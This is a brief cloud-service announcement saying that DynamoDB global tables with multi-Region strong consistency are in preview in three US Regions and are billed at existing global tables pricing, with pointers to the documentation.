The preview of DynamoDB global tables with multi-Region strong consistency is available in the following Regions: US East (N. Virginia), US East (Ohio), and US West (Oregon). DynamoDB global tables with multi-Region strong consistency is billed according to existing global tables pricing. To learn more about global tables multi-Region strong consistency, see the preview documentation. For information about DynamoDB global tables, see the global tables information page and the developer guide.

Read More for the details.